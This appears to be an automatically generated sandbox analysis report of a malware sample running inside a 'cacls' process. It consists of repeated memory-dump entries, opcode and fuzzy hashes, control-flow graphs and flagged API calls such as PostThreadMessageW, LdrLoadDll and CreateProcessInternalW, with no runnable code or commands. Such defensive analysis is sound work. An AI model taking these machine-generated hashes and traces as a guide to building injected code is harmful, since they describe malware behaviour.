                                                                                                              • Source File: 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3518174469.0000000003639000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3518174469.000000000363D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3510000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: bc6193edef593a326a3bbe3d8cc402fac8fa85dc495f1e8ef4bfc731e678a548
                                                                                                              • Instruction ID: 5ffc429301a86cf432ba1fdc5ba2d31c7574d387c1954c0216285e653b00e6fa
                                                                                                              • Opcode Fuzzy Hash: bc6193edef593a326a3bbe3d8cc402fac8fa85dc495f1e8ef4bfc731e678a548
                                                                                                              • Instruction Fuzzy Hash: 8F90023170540C02E550B1585414746004597D1311F59C012A4028655D87558B5576A5
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3518174469.0000000003639000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3518174469.000000000363D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3510000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 135ffeddac42ee2985fe4f4714b9417e51cf5f357656f999efe67cf5b2de1837
                                                                                                              • Instruction ID: 2d66f69aeacd942a41a46c95cad86eff08932dd150de36d36777c3eb5bc9be27
                                                                                                              • Opcode Fuzzy Hash: 135ffeddac42ee2985fe4f4714b9417e51cf5f357656f999efe67cf5b2de1837
                                                                                                              • Instruction Fuzzy Hash: B5900435311404031505F55C170450700C7D7D737135DC033F501D551CD731CD715135
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3518174469.0000000003639000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3518174469.000000000363D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3510000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 114bc31a1b1e23ccc959cdd3d9de9a45a99f3d97264bb6a1b3b4c63a34af576a
                                                                                                              • Instruction ID: 7b01b94e31f6a735f188d62515a672297728734821b0bd1c9698377692167efe
                                                                                                              • Opcode Fuzzy Hash: 114bc31a1b1e23ccc959cdd3d9de9a45a99f3d97264bb6a1b3b4c63a34af576a
                                                                                                              • Instruction Fuzzy Hash: 24900225321404021545F558160450B0485A7D7361399C016F541A591CC72189655325
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3518174469.0000000003639000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3518174469.000000000363D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3510000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 21ac9ac038b89c09f7da6c3a753d8b0986f25bb7b6d10430147603c28d9d78f5
                                                                                                              • Instruction ID: 198e09e57e6d1e57a9a0fd70a7fcbdd1e3f08348580e3c61af616c3c88b9b55f
                                                                                                              • Opcode Fuzzy Hash: 21ac9ac038b89c09f7da6c3a753d8b0986f25bb7b6d10430147603c28d9d78f5
                                                                                                              • Instruction Fuzzy Hash: 7C90026134140842E500B1585414B060045D7E2311F59C016E5068555D8719CD52612A
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3518174469.0000000003639000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3518174469.000000000363D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3510000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: bbc1519fd8832bfce5d93e1d9e51ed9c0e3d680fee0e9674914e74a6882f059e
                                                                                                              • Instruction ID: f7fd9c1cac873184fb0ab1796788a4f0f381094b8123c8cc70d989edcdaecea9
                                                                                                              • Opcode Fuzzy Hash: bbc1519fd8832bfce5d93e1d9e51ed9c0e3d680fee0e9674914e74a6882f059e
                                                                                                              • Instruction Fuzzy Hash: A3900221311C0442E600B5685C14B07004597D1313F59C116A4158555CCA1589615525
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3518174469.0000000003639000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3518174469.000000000363D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3510000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 176d127ff0c5e70eb8edc40499ab661d3f20580c9f2b2dd3c7396e608045c301
                                                                                                              • Instruction ID: 8af7c35b02d827cbe0fd0efdaa0f0c07e5f792644086c3a22b2c3d3841c05402
                                                                                                              • Opcode Fuzzy Hash: 176d127ff0c5e70eb8edc40499ab661d3f20580c9f2b2dd3c7396e608045c301
                                                                                                              • Instruction Fuzzy Hash: 26900221701404425540B16898449064045BBE2221759C122A499C551D865989655669
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3518174469.0000000003639000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3518174469.000000000363D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3510000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: de78d3ac4756b4b5dc1291049b63480b726155d0bc2eb54d71e445313c52e79c
                                                                                                              • Instruction ID: 020eae49e45df835fd234ce5cf3f75403ac9f9f598e6afe35aba6c2fa3a434c2
                                                                                                              • Opcode Fuzzy Hash: de78d3ac4756b4b5dc1291049b63480b726155d0bc2eb54d71e445313c52e79c
                                                                                                              • Instruction Fuzzy Hash: C190026130180803E540B5585804607004597D1312F59C012A6068556E8B298D516139
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3518174469.0000000003639000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3518174469.000000000363D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3510000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 64a35f96e719a528b7ae5e023ddaa6ac550aed469a149d13dabc7066d68c8ddb
                                                                                                              • Instruction ID: 6d1abb37773ecf5aef3aff1cbd31f05ff9cb827def57e4718085cb3b1273118c
                                                                                                              • Opcode Fuzzy Hash: 64a35f96e719a528b7ae5e023ddaa6ac550aed469a149d13dabc7066d68c8ddb
                                                                                                              • Instruction Fuzzy Hash: 4290022170140902E501B1585404616004A97D1251F99C023A5028556ECB258A92A135
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3518174469.0000000003639000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3518174469.000000000363D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3510000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: c821ea4965a86076d2b78462427a17268bc57142f18562e54a4c58922db451d9
                                                                                                              • Instruction ID: 3c4a5fe1634fd3c679f07d856a135afc68a39554c18473778d0725b2ed99aa80
                                                                                                              • Opcode Fuzzy Hash: c821ea4965a86076d2b78462427a17268bc57142f18562e54a4c58922db451d9
                                                                                                              • Instruction Fuzzy Hash: 8A90022931340402E580B158640860A004597D2212F99D416A4019559CCA1589695325
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3518174469.0000000003639000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3518174469.000000000363D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3510000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: c7a79f58c747e3907afeada980166b3b00dd1e59e6a345bf5b238fb647a4a3fa
                                                                                                              • Instruction ID: 365bf99a8f9944444b99020f155846b42101fc260fb8b4dc34739e593391ba34
                                                                                                              • Opcode Fuzzy Hash: c7a79f58c747e3907afeada980166b3b00dd1e59e6a345bf5b238fb647a4a3fa
                                                                                                              • Instruction Fuzzy Hash: 3C90022130140403E540B15864186064045E7E2311F59D012E4418555CDA1589565226
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3518174469.0000000003639000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3518174469.000000000363D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3510000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 53117ebb2ea12785da06137d18e875c25c93ddc6e63efd6333301d817d95cf7c
                                                                                                              • Instruction ID: 13433c1e4ab8758c3fd5820c7625ba4d3353a0056a7bec32260150877cefd314
                                                                                                              • Opcode Fuzzy Hash: 53117ebb2ea12785da06137d18e875c25c93ddc6e63efd6333301d817d95cf7c
                                                                                                              • Instruction Fuzzy Hash: B7900221342445526945F15854045074046A7E1251799C013A5418951C86269956D625
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3518174469.0000000003639000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3518174469.000000000363D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3510000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 0623da781ef3ff4f3ee7ab6cba67bc43efbae4aaf2c47d077982e6c10f2b8a2c
                                                                                                              • Instruction ID: ac11304e70fce4957323aa541e0bce488e25a1156db689c1a495b896a6f51f79
                                                                                                              • Opcode Fuzzy Hash: 0623da781ef3ff4f3ee7ab6cba67bc43efbae4aaf2c47d077982e6c10f2b8a2c
                                                                                                              • Instruction Fuzzy Hash: B090023130140813E511B1585504707004997D1251F99C413A4428559D97568A52A125
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3518174469.0000000003639000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3518174469.000000000363D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3510000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 7fcbaf8a77a21f6fdc97aea79591eafdfe4fb7bf8521d022260ccdcdfed0a816
                                                                                                              • Instruction ID: 921427d1af0afa6d8a380e85acfaedb60a42ce6584042cdbd206b5bd8c1bdf17
                                                                                                              • Opcode Fuzzy Hash: 7fcbaf8a77a21f6fdc97aea79591eafdfe4fb7bf8521d022260ccdcdfed0a816
                                                                                                              • Instruction Fuzzy Hash: AC90023130148C02E510B158940474A004597D1311F5DC412A8428659D879589917125
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3518174469.0000000003639000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3518174469.000000000363D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3510000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 9a9e342d57791bddc3cb4b7ab60848e18e634dbb1869d06f68600bd3f7dffa4c
                                                                                                              • Instruction ID: e0a29aec563d8968e35dc388047ed737a1ea91100d78daa4b7b5117a27e3c85e
                                                                                                              • Opcode Fuzzy Hash: 9a9e342d57791bddc3cb4b7ab60848e18e634dbb1869d06f68600bd3f7dffa4c
                                                                                                              • Instruction Fuzzy Hash: 9090023130140C42E500B1585404B46004597E1311F59C017A4128655D8715C9517525
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3518174469.0000000003639000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3518174469.000000000363D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3510000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3518174469.0000000003639000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3518174469.000000000363D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3510000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3518174469.0000000003639000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3518174469.000000000363D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3510000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 434 2cf3e10-2cf3e58 call 2cfb8d0 437 2cf3e5e-2cf3ed8 call 2cfb9b0 call 2ce4890 call 2cd13e0 call 2cf1fe0 434->437 438 2cf3f64-2cf3f6a 434->438 447 2cf3ee0-2cf3ef4 Sleep 437->447 448 2cf3ef6-2cf3f08 447->448 449 2cf3f55-2cf3f5c 447->449 450 2cf3f2a-2cf3f43 call 2cf6370 448->450 451 2cf3f0a-2cf3f28 call 2cf62d0 448->451 449->447 452 2cf3f5e 449->452 456 2cf3f48-2cf3f4b 450->456 451->456 452->438 456->449
                                                                                                              APIs
                                                                                                              • Sleep.KERNELBASE(000007D0), ref: 02CF3EEB
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3516914992.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2cd0000_cacls.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Sleep
                                                                                                              • String ID: i:4$net.dll$wininet.dll
                                                                                                              • API String ID: 3472027048-2634764057

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 457 2ce0ffc-2ce1016 458 2ce1019-2ce1054 457->458 459 2ce1056 458->459 460 2ce10b4-2ce110a call 2ce4890 call 2cd13e0 call 2cf1fe0 458->460 462 2ce1057-2ce1058 459->462 477 2ce110c-2ce111b PostThreadMessageW 460->477 478 2ce112a-2ce1130 460->478 464 2ce105a-2ce106c 462->464 465 2ce1084 462->465 464->458 473 2ce106e-2ce1075 464->473 465->462 466 2ce1085-2ce1087 465->466 468 2ce1089-2ce1090 466->468 469 2ce1091 466->469 468->469 475 2ce1077-2ce1080 473->475 476 2ce1082-2ce1083 473->476 475->476 476->465 477->478 479 2ce111d-2ce1127 477->479 479->478
                                                                                                              APIs
                                                                                                              • PostThreadMessageW.USER32(t577G2K6,00000111,00000000,00000000), ref: 02CE1117
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3516914992.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2cd0000_cacls.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: MessagePostThread
                                                                                                              • String ID: t577G2K6$t577G2K6
                                                                                                              • API String ID: 1836367815-2667467881

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 480 2ce1097-2ce10d2 call 2cfba00 call 2cfc410 485 2ce10d8-2ce110a call 2cd13e0 call 2cf1fe0 480->485 486 2ce10d3 call 2ce4890 480->486 491 2ce110c-2ce111b PostThreadMessageW 485->491 492 2ce112a-2ce1130 485->492 486->485 491->492 493 2ce111d-2ce1127 491->493 493->492
                                                                                                              APIs
                                                                                                              • PostThreadMessageW.USER32(t577G2K6,00000111,00000000,00000000), ref: 02CE1117
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3516914992.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2cd0000_cacls.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: MessagePostThread
                                                                                                              • String ID: t577G2K6$t577G2K6
                                                                                                              • API String ID: 1836367815-2667467881

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 494 2ce10a0-2ce10b2 495 2ce10ba-2ce10d2 call 2cfc410 494->495 496 2ce10b5 call 2cfba00 494->496 499 2ce10d8-2ce110a call 2cd13e0 call 2cf1fe0 495->499 500 2ce10d3 call 2ce4890 495->500 496->495 505 2ce110c-2ce111b PostThreadMessageW 499->505 506 2ce112a-2ce1130 499->506 500->499 505->506 507 2ce111d-2ce1127 505->507 507->506
                                                                                                              APIs
                                                                                                              • PostThreadMessageW.USER32(t577G2K6,00000111,00000000,00000000), ref: 02CE1117
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3516914992.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2cd0000_cacls.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: MessagePostThread
                                                                                                              • String ID: t577G2K6$t577G2K6
                                                                                                              • API String ID: 1836367815-2667467881
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3516914992.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2cd0000_cacls.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: InitializeUninitialize
                                                                                                              • String ID: @J7<
                                                                                                              • API String ID: 3442037557-2016760708
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3516914992.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2cd0000_cacls.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: InitializeUninitialize
                                                                                                              • String ID: @J7<
                                                                                                              • API String ID: 3442037557-2016760708
                                                                                                              APIs
                                                                                                              • SetErrorMode.KERNELBASE(00008003,?,?,02CE2040,02CF834F,02CF5A0E,02CE2006), ref: 02CE84E3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3516914992.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2cd0000_cacls.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorMode
                                                                                                              • String ID:
                                                                                                              • API String ID: 2340568224-0
                                                                                                              APIs
                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02CE4902
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3516914992.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2cd0000_cacls.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Load
                                                                                                              • String ID:
                                                                                                              • API String ID: 2234796835-0
                                                                                                              APIs
                                                                                                              • CreateProcessInternalW.KERNELBASE(?,?,?,?,02CE867E,00000010,?,?,?,00000044,?,00000010,02CE867E,?,?,?), ref: 02CF9CD0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3516914992.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2cd0000_cacls.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CreateInternalProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 2186235152-0
                                                                                                              APIs
                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02CE4902
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3516914992.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2cd0000_cacls.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Load
                                                                                                              • String ID:
                                                                                                              • API String ID: 2234796835-0
                                                                                                              APIs
                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02CD9E35
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3516914992.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2cd0000_cacls.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CreateThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 2422867632-0
                                                                                                              APIs
                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02CD9E35
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3516914992.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2cd0000_cacls.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CreateThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 2422867632-0
                                                                                                              APIs
                                                                                                              • SetErrorMode.KERNELBASE(00008003,?,?,02CE2040,02CF834F,02CF5A0E,02CE2006), ref: 02CE84E3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3516914992.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2cd0000_cacls.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorMode
                                                                                                              • String ID:
                                                                                                              • API String ID: 2340568224-0
                                                                                                              APIs
